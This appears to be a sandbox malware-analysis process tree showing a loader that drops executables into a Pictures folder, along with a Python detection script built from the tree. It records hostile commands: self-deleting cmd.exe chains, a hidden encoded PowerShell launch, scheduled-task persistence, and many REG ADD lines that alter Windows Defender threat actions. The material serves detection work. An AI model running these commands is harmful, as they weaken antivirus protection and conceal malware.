C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 6683⤵
- Program crash
-
C:\Users\Admin\Pictures\Minor Policy\GosxYJzZkoJQOXo9mXaLnZ9Q.exe"C:\Users\Admin\Pictures\Minor Policy\GosxYJzZkoJQOXo9mXaLnZ9Q.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\6nu8WAAz96Ll697FGgrU_0Ep.exe"C:\Users\Admin\Pictures\Minor Policy\6nu8WAAz96Ll697FGgrU_0Ep.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\oMPcKCByxz6c6aQOVuge8D1R.exe"C:\Users\Admin\Pictures\Minor Policy\oMPcKCByxz6c6aQOVuge8D1R.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Minor Policy\oMPcKCByxz6c6aQOVuge8D1R.exe"C:\Users\Admin\Pictures\Minor Policy\oMPcKCByxz6c6aQOVuge8D1R.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Minor Policy\OaITYmj2fsq0x8aMFqNsCs4j.exe"C:\Users\Admin\Pictures\Minor Policy\OaITYmj2fsq0x8aMFqNsCs4j.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @/c taskkill /im AppLaunch.exe /f & timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" & del C:\PrograData\*.dll & exit4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im AppLaunch.exe /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Minor Policy\eHFS6NZuqQ_xO0mJVksaQreP.exe"C:\Users\Admin\Pictures\Minor Policy\eHFS6NZuqQ_xO0mJVksaQreP.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Minor Policy\nnb09fHefcHKAg9TUhBoFZHP.exe"C:\Users\Admin\Pictures\Minor Policy\nnb09fHefcHKAg9TUhBoFZHP.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Minor Policy\5XX9Z8GfruEUHkqLJGNcaeDq.exe"C:\Users\Admin\Pictures\Minor Policy\5XX9Z8GfruEUHkqLJGNcaeDq.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
C:\Users\Admin\Pictures\Minor Policy\gVzdKeepeV1HvUj2IfZ0crmv.exe"C:\Users\Admin\Pictures\Minor Policy\gVzdKeepeV1HvUj2IfZ0crmv.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Minor Policy\Dj7oV6pePcIXJQ2f96mvaT24.exe"C:\Users\Admin\Pictures\Minor Policy\Dj7oV6pePcIXJQ2f96mvaT24.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" à D†/c taskkill /im Dj7oV6pePcIXJQ2f96mvaT24.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Minor Policy\Dj7oV6pePcIXJQ2f96mvaT24.exe" & del C:\PrograData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Dj7oV6pePcIXJQ2f96mvaT24.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 18123⤵
- Program crash
-
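Several patterns repeat across the tree above and are worth turning into rules: the VQbpujdSGomqnbS9WjiyreEK.exe chain (icacls denying Everyone, S-1-1-0, delete rights on its working folder, the --Admin IsNotAutoStart IsNotTask relaunch, and build3.exe's "Azure-Update-Task" firing every minute); the cmd.exe self-delete chains (taskkill, timeout, del) under build2.exe, AppLaunch.exe and Dj7oV6pePcIXJQ2f96mvaT24.exe; and .NET framework hosts (RegAsm.exe, vbc.exe, AppLaunch.exe) started with no arguments by a dropped executable, which is the shape SetThreadContext-based hollowing leaves in a tree. The Python below is an added example, not part of the report or of any tool or family it names: it parses the report's own line format (image path, command line and depth glued together, ending in ⤵) into a parent-linked tree and runs those rules over lines quoted verbatim from the tree. Rule names and the sample selection are this example's own.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Lines copied verbatim from the process tree in this report: the root Install.exe, the
# VQbpujdSGomqnbS9WjiyreEK.exe chain, OaITYmj2fsq0x8aMFqNsCs4j.exe with its AppLaunch.exe child
# and self-delete, and Dj7oV6pePcIXJQ2f96mvaT24.exe with its self-delete.
REPORT_LINES = [
    r'C:\Users\Admin\AppData\Local\Temp\Temp1_File.zip\Install.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_File.zip\Install.exe"1⤵',
    r'C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe"C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe"2⤵',
    r'C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe"C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe"3⤵',
    r'C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\fc9a62cb-7d5f-48e5-9c75-c63867ff4d84" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵',
    r'C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe"C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe" --Admin IsNotAutoStart IsNotTask4⤵',
    r'C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe"C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe" --Admin IsNotAutoStart IsNotTask5⤵',
    r'C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build2.exe"C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build2.exe"6⤵',
    r'C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build2.exe"C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build2.exe"7⤵',
    r'C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" ȸo/c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build2.exe" & del C:\PrograData\*.dll & exit8⤵',
    r'C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build3.exe"C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build3.exe"6⤵',
    r'C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵',
    r'C:\Users\Admin\Pictures\Minor Policy\OaITYmj2fsq0x8aMFqNsCs4j.exe"C:\Users\Admin\Pictures\Minor Policy\OaITYmj2fsq0x8aMFqNsCs4j.exe"2⤵',
    r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵',
    r'C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @/c taskkill /im AppLaunch.exe /f & timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" & del C:\PrograData\*.dll & exit4⤵',
    r'C:\Users\Admin\Pictures\Minor Policy\Dj7oV6pePcIXJQ2f96mvaT24.exe"C:\Users\Admin\Pictures\Minor Policy\Dj7oV6pePcIXJQ2f96mvaT24.exe"2⤵',
    r'C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" à D†/c taskkill /im Dj7oV6pePcIXJQ2f96mvaT24.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Minor Policy\Dj7oV6pePcIXJQ2f96mvaT24.exe" & del C:\PrograData\*.dll & exit3⤵',
]

# The report glues <image path><command line><depth>⤵ into one line. The image path runs up to the
# first .exe/.pif/.tmp that is not followed by "\" or "."; the single digit before ⤵ is the depth
# (ambiguous only when a command line itself ends in a digit, which none of the sampled lines do).
LINE_RE = re.compile(
    r'^(?P<path>(?:\\\?\?\\)?[A-Za-z]:\\.*?\.(?:exe|pif|tmp)(?![\\.]))'
    r'(?P<cmd>.*?)(?P<depth>\d)⤵$',
    re.I | re.S,
)


@dataclass
class Proc:
    path: str
    cmd: str
    depth: int
    parent: Optional["Proc"] = None

    @property
    def image(self) -> str:
        return self.path.rsplit("\\", 1)[-1].lower()


def parse_tree(lines):
    """Turn report lines into Proc objects, linking each to the most recent process one level up."""
    procs, last_at_depth = [], {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            raise ValueError(f"not a process-tree line: {line[:60]!r}")
        p = Proc(m["path"], m["cmd"].strip(), int(m["depth"]))
        p.parent = last_at_depth.get(p.depth - 1)
        last_at_depth[p.depth] = p
        procs.append(p)
    return procs


# .NET framework utilities that appear as injection targets in this tree; extend as needed.
NET_HOSTS = {"regasm.exe", "applaunch.exe", "vbc.exe"}


def dotnet_host_hollowing(p: Proc) -> bool:
    """A .NET host started with nothing but its own quoted path, by a process living under C:\\Users."""
    return (p.image in NET_HOSTS
            and re.fullmatch(r'"[^"]*"', p.cmd) is not None
            and p.parent is not None
            and re.search(r'\\Users\\', p.parent.path, re.I) is not None)


RULES = {
    # the loader drops its payloads under the user's Pictures folder
    "payload_in_pictures": lambda p: re.search(r'\\Users\\[^\\]+\\Pictures\\', p.path, re.I) is not None,
    # Everyone (S-1-1-0) denied delete rights on the ransomware's working folder
    "icacls_deny_everyone": lambda p: p.image == "icacls.exe" and re.search(r'/deny\s+\*S-1-1-0:', p.cmd, re.I) is not None,
    "djvu_relaunch_flags": lambda p: re.search(r'--Admin\s+IsNotAutoStart\s+IsNotTask', p.cmd) is not None,
    "schtasks_every_minute": lambda p: p.image == "schtasks.exe" and re.search(r'/create\b.*/sc\s+minute\s+/mo\s+1\b', p.cmd, re.I) is not None,
    # kill own image, optionally wait, then del/erase the file; the stray bytes before /c are ignored
    "self_delete_chain": lambda p: p.image == "cmd.exe" and re.search(r'taskkill\s+/im\s+\S+.*&.*\b(?:del|erase)\s', p.cmd, re.I) is not None,
    "dotnet_host_hollowing": dotnet_host_hollowing,
}


def scan(lines):
    """Return (depth, image, rule) for every rule that fires on every parsed line."""
    hits = []
    for p in parse_tree(lines):
        for name, rule in RULES.items():
            if rule(p):
                hits.append((p.depth, p.image, name))
    return hits


def summarize(lines):
    counts = {}
    for _, _, name in scan(lines):
        counts[name] = counts.get(name, 0) + 1
    return counts


if __name__ == "__main__":
    for depth, image, name in scan(REPORT_LINES):
        print(f"{'  ' * depth}{image}: {name}")
```

The self-delete rule deliberately skips over the stray characters between the cmd.exe image and /c (ȸo, @, à D† in the lines above); they differ from launch to launch and are not something to key on. Parent resolution relies only on the depth digit, so it works on any slice of the tree as long as each sampled subtree is quoted in order from its top.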
C:\Users\Admin\Pictures\Minor Policy\KJN4UTMVm4u4hm7saACgHkd5.exe"C:\Users\Admin\Pictures\Minor Policy\KJN4UTMVm4u4hm7saACgHkd5.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\KJN4UTMVm4u4hm7saACgHkd5.exe"C:\Users\Admin\Pictures\Minor Policy\KJN4UTMVm4u4hm7saACgHkd5.exe" -h3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\n2bxaZuE24qU0suJTAECSlqq.exe"C:\Users\Admin\Pictures\Minor Policy\n2bxaZuE24qU0suJTAECSlqq.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Process (depth 1): C:\Windows\system32\svchost.exe
Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

Process (depth 1): C:\Windows\system32\svchost.exe
Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

Process (depth 1): C:\Windows\system32\WerFault.exe
Command line: C:\Windows\system32\WerFault.exe -pss -s 464 -p 5764 -ip 5764

Process (depth 1): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5716 -ip 5716

Process (depth 1): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5716 -ip 5716

Process (depth 1): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5716 -ip 5716

Process (depth 1): C:\Windows\system32\rundll32.exe
Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
- Process spawned unexpected child process

Process (depth 2): C:\Windows\SysWOW64\rundll32.exe
Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
- Loads dropped DLL

Process (depth 3): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 71640 -s 604
- Program crash

Process (depth 1): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 71640 -ip 71640

Process (depth 1): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5716 -ip 5716

Process (depth 1): C:\Windows\system32\WerFault.exe
Command line: C:\Windows\system32\WerFault.exe -pss -s 504 -p 51484 -ip 51484

Process (depth 1): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5716 -ip 5716

Process (depth 1): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 51464 -ip 51464

Process (depth 1): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5716 -ip 5716

Process (depth 1): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 51464 -ip 51464

Process (depth 1): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5716 -ip 5716

Process (depth 1): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 51464 -ip 51464

Process (depth 1): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5716 -ip 5716

Process (depth 1): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 51464 -ip 51464

Process (depth 1): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5716 -ip 5716

Process (depth 1): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
Decoded EncodedCommand (base64 of UTF-16LE): start-process -WindowStyle Hidden gpupdate.exe /force

Process (depth 2): C:\Windows\system32\gpupdate.exe
Command line: "C:\Windows\system32\gpupdate.exe" /force

Process (depth 1): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 51464 -ip 51464

Process (depth 1): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6012 -ip 6012

Process (depth 1): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5716 -ip 5716

Process (depth 1): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 51464 -ip 51464

Process (depth 1): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 51464 -ip 51464

Process (depth 1): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 51464 -ip 51464

Process (depth 1): C:\Users\Admin\Programs\Adblock\DnsService.exe
Command line: C:\Users\Admin\Programs\Adblock\DnsService.exe
- Drops file in Drivers directory
- Executes dropped EXE

Process (depth 1): C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 51464 -ip 51464

Process (depth 1): C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj\VHmGlhdyjvOSxCI\daUkIim.exe
Command line: C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj\VHmGlhdyjvOSxCI\daUkIim.exe HU /site_id 525403 /S
- Executes dropped EXE
- Drops file in System32 directory

Process (depth 2): C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
- Drops file in System32 directory
- Modifies data under HKEY_USERS

Process (depth 3): C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

Process (depth 4): C:\Windows\SysWOW64\reg.exe
Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

Process (depth 3): C:\Windows\SysWOW64\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

Process (depth 3): C:\Windows\SysWOW64\reg.exe
